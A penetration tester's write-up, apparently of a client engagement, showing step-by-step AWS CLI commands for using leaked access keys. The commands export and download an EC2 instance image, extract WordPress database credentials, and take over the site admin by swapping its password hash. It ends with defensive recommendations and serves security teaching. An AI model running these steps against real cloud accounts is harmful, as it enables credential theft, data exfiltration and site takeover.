aws iam list-users --profile compromised

The above output showed I had access to the client's AWS infrastructure via access keys. Getting hold of these keys is valuable from an attacker's point of view: because keys are generally considered more secure than common passwords, they are often not protected by MFA (even though AWS recommends this as a best practice). In this case a second factor was not required to access the AWS infrastructure. The next step was to understand the level of access that I had. The following command showed that I had administrative permissions on EC2 and S3:
aws iam list-policies --profile compromised | grep "PolicyName" | grep -i EC2

For completeness, you can use the following AWS CLI commands to identify the level of access that you have:
aws iam list-groups-for-user --user-name USER-NAME-HERE
aws iam list-attached-group-policies --group-name GROUP-NAME-HERE
aws iam list-group-policies --group-name GROUP-NAME-HERE
aws iam list-attached-user-policies --user-name USER-NAME-HERE
aws iam list-user-policies --user-name USER-NAME-HERE

Like any cloud platform, AWS lets you decide in which country (region, in AWS terminology) you want to host your infrastructure. In order to discover where the EC2 instance running the website was hosted, I ran the following bash one-liner, which listed EC2 instances across all regions:
for region in `aws ec2 describe-regions --output text --profile compromised | cut -f4`; do echo -e "\nListing Instances in region:'$region'..."; aws ec2 describe-instances --region $region --profile compromised; done

In an environment with many EC2 instances running, identifying the one you want to target can be a little challenging. Probably the simplest way is to crosscheck the public IP of the target website against the public IP addresses assigned to the EC2 network interfaces. I found a match, so I was sure that the EC2 instance (i-0**************8) was hosting the WordPress site I wanted to compromise, as shown below. At this stage I considered the following options for taking over the EC2 instance:
1. Dump the private SSH key via the AWS CLI. This is not possible, because AWS does not store private keys.
2. Create a new SSH key pair. This was not a viable option because it required stopping the running EC2 instance and relaunching it with the specified key pair, and I didn't want to cause any disruption. However, it is worth mentioning that if ec2-instance-connect had been installed, I would not have needed to relaunch the EC2 instance to attach a new key pair.
3. Send OS commands directly to the EC2 instance using SSM. Unfortunately this was not a viable option either, as the SSM agent was not installed on the EC2 instance. If you are lucky and the SSM agent is installed, you can use the following commands to execute a command on the EC2 instance and retrieve the output, respectively:
aws ssm send-command --instance-ids "INSTANCE-ID-HERE" --document-name "AWS-RunShellScript" --comment "IP Config" --parameters commands=ifconfig --output text --query "Command.CommandId" --profile YOUR-PROFILE
aws ssm list-command-invocations --command-id "COMMAND-ID-HERE" --details --query "CommandInvocations[].CommandPlugins[].{Status:Status,Output:Output}" --profile YOUR-PROFILE
4. Create a snapshot of the EC2 instance, share it with an AWS account that I control, and download it. However, this required an AWS account of my own, and I didn't want to create one specifically for this task.
5. Export the EC2 instance to an S3 bucket and then download it. It is worth mentioning that AWS tenants pay for storage, so before diving in it is worth checking the size of the EC2 instance and the cost implications. I decided to go with this option as it seemed the quickest, and the EC2 instance was less than 5 GB.
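As an aside, the IP crosscheck mentioned earlier does not have to be done by eye: describe-instances supports a server-side filter on the public IPv4 address. A sketch, using a documentation IP (203.0.113.10) in place of the client's real address:

```shell
# Find the instance whose public IPv4 address matches the target website's.
# 203.0.113.10 is a documentation/example IP, not the client's real address.
aws ec2 describe-instances \
    --filters "Name=ip-address,Values=203.0.113.10" \
    --query "Reservations[].Instances[].InstanceId" \
    --output text --profile compromised --region eu-west-2
```

This returns the instance ID directly, which saves scrolling through the full describe-instances output in a busy account.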
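On option 2 above: where the EC2 Instance Connect agent is present, a temporary public key can be pushed to the instance and used for a normal SSH login, with no relaunch required. A sketch, with hypothetical instance ID, availability zone and key file names:

```shell
# Generate a throwaway key pair (file names are hypothetical)
ssh-keygen -t rsa -b 2048 -f ./tempkey -N ""

# Push the public key; it remains valid on the instance for ~60 seconds
aws ec2-instance-connect send-ssh-public-key \
    --instance-id i-0EXAMPLE \
    --availability-zone eu-west-2a \
    --instance-os-user ec2-user \
    --ssh-public-key file://tempkey.pub \
    --profile compromised --region eu-west-2

# Log in before the key expires
ssh -i ./tempkey ec2-user@PUBLIC-IP-HERE
```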
The first step was to create the S3 bucket:

aws s3 mb s3://vm-export-0 --profile compromised --region eu-west-2

I then listed the S3 buckets to ensure that the bucket had been created. Next, I took advantage of "create-instance-export-task" to create a snapshot of the running EC2 instance and place it in the S3 bucket. As part of the command I specified a "s3bucket.txt" file containing instructions on the format of the snapshot, as you can export it in several different formats (VMDK, VHD or RAW). First, grant read and write permissions on the S3 bucket to the "[email protected]" account (id=c4d8eab..322):

aws s3api put-bucket-acl --bucket vm-export-0 --grant-full-control id=c4d8eabf8db69dbe46bfe0e517100c554f01200b104d59cd408e777ba442a322 --profile compromised --region eu-west-2

Then I created the export task to snapshot the instance into the bucket.
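For reference, the "s3bucket.txt" file passed via file:// is a JSON document describing the export destination and format. A minimal sketch consistent with the OVA/VMDK export used here (the S3Prefix value is a hypothetical choice):

```json
{
    "ContainerFormat": "ova",
    "DiskImageFormat": "VMDK",
    "S3Bucket": "vm-export-0",
    "S3Prefix": "vmexport"
}
```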
aws ec2 create-instance-export-task --instance-id i-*************308 --target-environment vmware --export-to-s3-task file://s3bucket.txt --profile compromised --region eu-west-2

Once this was done, the export task ran in the background. Creating the snapshot was a fairly long wait (approximately 20 minutes). I used the following command to check the state of the export task:
aws ec2 describe-export-tasks --export-task-ids export-i-0c***********4c --profile compromised --region eu-west-2

When the task was complete, I could see the new snapshot in the S3 bucket:
aws s3 ls --profile compromised vm-export-0

Then I proceeded to download the snapshot:
aws s3api get-object --bucket vm-export-0 --key vmexport-i-0***************c.ova vmexport-i-0****************c.ova --profile compromised

Once this was done, I cleaned up by deleting the S3 bucket:
aws s3 rb s3://vm-export-0 --force --profile compromised

On my local machine I extracted the OVA file and mounted the VMDK on my file system, as shown below: Then in the WordPress folder I found the "wp-config.php" file containing database credentials: Unfortunately for my client, the SQL database was exposed on the Internet, so I was able to log in remotely. This allowed me to easily take over the admin account of the WordPress site by replacing its password hash with one for which I knew the clear-text password.
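The extraction and mount steps can be sketched as follows (file names and mount point are hypothetical; mounting the VMDK this way assumes the libguestfs tools are installed):

```shell
# An OVA is a tar archive: unpack it to get the VMDK disk image
tar -xvf vmexport-i-0EXAMPLE.ova

# Mount the disk image read-only with libguestfs
mkdir -p /mnt/vm
guestmount -a vmexport-i-0EXAMPLE-disk1.vmdk -i --ro /mnt/vm

# Recover the database credentials from the WordPress configuration
grep -E "DB_(NAME|USER|PASSWORD|HOST)" /mnt/vm/var/www/html/wp-config.php
```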
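As for the replacement hash itself, there is no need to craft a phpass hash: WordPress also accepts a plain MD5 digest in user_pass for backwards compatibility and transparently re-hashes it on the next successful login. A sketch with a hypothetical password:

```shell
# 'NewPassw0rd!' is a hypothetical replacement password; WordPress accepts
# the raw MD5 digest in wp_users.user_pass and upgrades it on next login.
echo -n 'NewPassw0rd!' | md5sum | cut -d' ' -f1
```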
UPDATE wp_users SET user_pass = '$P$*********************v/' WHERE id = '1';

Then I jumped to the "/wp-admin/" directory of the target website and logged in as an administrator: I then changed the password hash of the admin account back to its original value to ensure that the client could still log in. This was an interesting journey, which has shown that:
- Mobile apps are often left out from a secure software development cycle and not thoroughly reviewed.
- Keys are typically considered more secure than passwords and thus MFA is not enforced.
- Vulnerabilities in a mobile app can lead to full compromise of a cloud service account, not just the mobile app.
My recommendations to the client were to:

- Have an application security design review prior to application development.
- Regularly review use of access keys and treat them the same as credentials.
- Have regular cloud security assessments to pick up common security risks and security risks specific to cloud service providers.
- Have penetration tests on mobile apps and related infrastructure.